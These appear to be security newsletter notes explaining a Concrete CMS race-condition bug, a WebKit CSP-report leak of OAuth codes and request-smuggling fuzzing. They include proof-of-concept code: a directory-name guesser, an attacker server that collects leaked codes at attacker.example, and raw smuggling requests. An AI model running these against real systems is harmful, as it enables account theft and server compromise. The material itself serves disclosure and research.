101 - Big Bounties by Exploiting WebKit's CSP & Concrete CMS Bugs
Weak randomness leading to a predictable filename enabling code execution…
In an already risky feature, a limited user can download remote files by providing a URL to Concrete CMS, which will curl the file with a 60-second timeout. While the CMS does try to ensure the user is not uploading any .php files which might result in code execution, these checks happen after the file has already been downloaded.
If the check fails, the file (which is in a VolatileDirectory) is deleted along with the directory when the object is destroyed (effectively the end of the request).
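To make the race window concrete, here is a minimal Python analogue of the pattern as described (hypothetical code, not Concrete CMS's actual implementation):

```python
import os
import shutil
import tempfile
import urllib.request


class VolatileDir:
    """Hypothetical stand-in for the VolatileDirectory: the directory
    is only removed when the object is destroyed, effectively the end
    of the request."""

    def __init__(self):
        # The real directory name comes from uniqid(); see below.
        self.path = tempfile.mkdtemp()

    def __del__(self):
        shutil.rmtree(self.path, ignore_errors=True)


def import_remote_file(url: str, vol: VolatileDir) -> bool:
    dest = os.path.join(vol.path, "upload.php")
    # 1. The file is fully written to disk first (the CMS curls it
    #    with a 60-second timeout)...
    urllib.request.urlretrieve(url, dest)
    # 2. ...and only validated afterwards. Even on failure the payload
    #    stays on disk until `vol` is destroyed, so anyone who guesses
    #    the directory name can request upload.php while it exists.
    return not dest.endswith(".php")
```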
The VolatileDirectory’s name is made somewhat random through uniqid(), which is derived from the current time in seconds and microseconds. An attacker must guess the directory name before the request ends; the seconds are predictable from the server’s Date header, but the microseconds leave another million possibilities. So, at most 1 million requests inside the 60-second request lifetime.
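Since uniqid() with no arguments is just the current time formatted as 13 hex characters (8 for the Unix timestamp, 5 for the microsecond component), the entire guess space for a known second can be enumerated up front. A minimal sketch, taking the second from the server's Date header:

```python
import email.utils


def uniqid(sec: int, usec: int) -> str:
    """PHP's uniqid() with no arguments: 8 hex digits of the Unix
    timestamp followed by 5 hex digits of the microsecond component."""
    return f"{sec:08x}{usec:05x}"


def candidates(date_header: str):
    """Yield every possible directory name for the second indicated by
    the server's Date header -- at most 1,000,000 guesses."""
    sec = int(email.utils.parsedate_to_datetime(date_header).timestamp())
    for usec in range(1_000_000):
        yield uniqid(sec, usec)


# candidates("Wed, 21 Oct 2015 07:28:00 GMT") yields
# "56273e8000000" through "56273e80f423f"
```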
The author was able to do this using Turbo Intruder, hitting 16k-17k requests per second, so 500-700k requests in the 30-second window their attack script was working with.
The root issue is that WebKit violates the specification for Content-Security-Policy (CSP) violation reports, leaking the destination of a violating redirect rather than the origin in the documentURI field of the report.
This may sound like a rather benign issue, but it can be used to great effect against OAuth implementations, for example. During a normal OAuth authorization code flow, once a user has been validated by the OAuth provider (like Google, Facebook, or Apple), they will be redirected back to the source application with an authorization code in the URL parameters. If that redirection causes a CSP violation, the report generated for it will leak the authorization code on WebKit-based browsers.
An attacker can create this situation through a maliciously crafted CSP policy on their own page that allows a request to the authentication provider but not to the final redirect destination, and set themselves up to catch the violation report, leaking the authorization code when the violation happens.
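A minimal sketch of the attacker's side (hostnames and OAuth parameters here are all hypothetical): the served page carries a CSP that allows the provider's authorize endpoint but not the redirect_uri destination, and points report-uri back at the attacker.

```python
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

AUTH_URL = ("https://provider.example/oauth/authorize"
            "?client_id=victim-app&response_type=code"
            "&redirect_uri=https://victim-app.example/callback")

# The provider's 302 to victim-app.example is what violates img-src.
PAGE = f'<img src="{AUTH_URL}">'.encode()


class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        # Allow the provider, disallow the redirect destination,
        # and send violation reports back to us.
        self.send_header("Content-Security-Policy",
                         "img-src https://provider.example; "
                         "report-uri https://attacker.example/report")
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(PAGE)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        report = json.loads(self.rfile.read(length)).get("csp-report", {})
        # Per spec this should be stripped down to an origin; on affected
        # WebKit it carried the full post-redirect URL, i.e.
        # https://victim-app.example/callback?code=...
        print("leaked:", report.get("document-uri"))
        self.send_response(204)
        self.end_headers()


if __name__ == "__main__":
    HTTPServer(("", 8080), Handler).serve_forever()
```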
This does require that the victim page automatically redirect without user interaction, which is normally the situation when a user has previously authorized the application; with that caveat, the attack is fairly effective. It also depends on the victim visiting an attacker-controlled page, but given that the attack does not need to be targeted at a specific user, it's still quite damaging.
This paper successfully applies differential fuzzing to find potential methods of introducing a parsing desync leading to request smuggling.
Much of the recent uptick in request smuggling issues has been due to a desync between how the entrypoint server, such as a load balancer, and the backend server parse requests. The Content-Length and Transfer-Encoding headers have been the primary focus of these attacks.
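For reference, the classic shape of such a desync (illustrative only): in a CL.TE pair, the front end trusts Content-Length and forwards the whole buffer as one request, while a back end that prioritizes Transfer-Encoding sees the body end at the 0-chunk and treats the trailing bytes as the start of a second, smuggled request.

```python
raw = (
    b"POST / HTTP/1.1\r\n"
    b"Host: victim.example\r\n"
    b"Content-Length: 33\r\n"          # front end reads all 33 body bytes
    b"Transfer-Encoding: chunked\r\n"  # back end stops at the 0-chunk
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /smuggled HTTP/1.1\r\n"      # left in the back end's buffer as
    b"X: y"                            # the prefix of the "next" request
)
```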
What these authors sought to do was discover other ways of introducing a desync that could result in request smuggling. They did this through differential fuzzing: they created a grammar-based fuzzer and then looked for differences between responses when the same request was made against different server pairs.
While they do detail exactly which server pairs were vulnerable to which type of corruption, I think the mutations themselves (pages 7-8) were the most interesting part of the paper, as often you won't know which servers are involved. A few of them are sketched in code after the lists below.
Request Line Mutations
- Mangled Method
- Distorted Protocol
- Invalid Version
- Manipulated Termination
- Embedded Request Lines
Request Headers Mutations
- Distorted Header Value
- Manipulated Termination
- Expect Header
- Identity Encoding
- V1.0 Chunked Encoding
- Double Transfer-Encoding
Request Body Mutations
- Chunk-Size Chunk-Data Mismatch
- Manipulated Chunk-Size Termination
- Manipulated Chunk-Extension Termination
- Manipulated Chunk-Data Termination
- Mangled Last-Chunk
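As a rough illustration (not the paper's actual fuzzer; hostnames are placeholders), here is how a few of these mutations could be applied to a baseline chunked request and the responses diffed across two servers:

```python
import socket

BASE = (b"POST / HTTP/1.1\r\n"
        b"Host: {host}\r\n"
        b"Transfer-Encoding: chunked\r\n"
        b"\r\n"
        b"5\r\nhello\r\n0\r\n\r\n")


def v10_chunked(req: bytes) -> bytes:
    # "V1.0 Chunked Encoding": chunked bodies aren't defined for
    # HTTP/1.0, so servers disagree on whether to honor the header.
    return req.replace(b"HTTP/1.1", b"HTTP/1.0", 1)


def double_te(req: bytes) -> bytes:
    # "Double Transfer-Encoding": some servers use the first value,
    # others the last.
    return req.replace(
        b"Transfer-Encoding: chunked\r\n",
        b"Transfer-Encoding: chunked\r\nTransfer-Encoding: identity\r\n", 1)


def mangled_chunk_size_termination(req: bytes) -> bytes:
    # "Manipulated Chunk-Size Termination": a bare LF after the
    # chunk size instead of CRLF.
    return req.replace(b"5\r\nhello", b"5\nhello", 1)


def probe(host: str, req: bytes) -> bytes:
    with socket.create_connection((host, 80), timeout=5) as s:
        s.sendall(req.replace(b"{host}", host.encode()))
        return s.recv(4096).split(b"\r\n", 1)[0]  # status line only


def differential(host_a: str, host_b: str) -> None:
    for mut in (v10_chunked, double_te, mangled_chunk_size_termination):
        req = mut(BASE)
        a, b = probe(host_a, req), probe(host_b, req)
        if a != b:  # servers disagree on the same bytes: desync candidate
            print(mut.__name__, a, b)


# differential("frontend.example", "backend.example")
```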
Using these mutations they did find several server pairs that were vulnerable to request smuggling; largely it seemed like Akamai was the odd one out, being involved in most of the issues discovered. The results are graphed on page 10.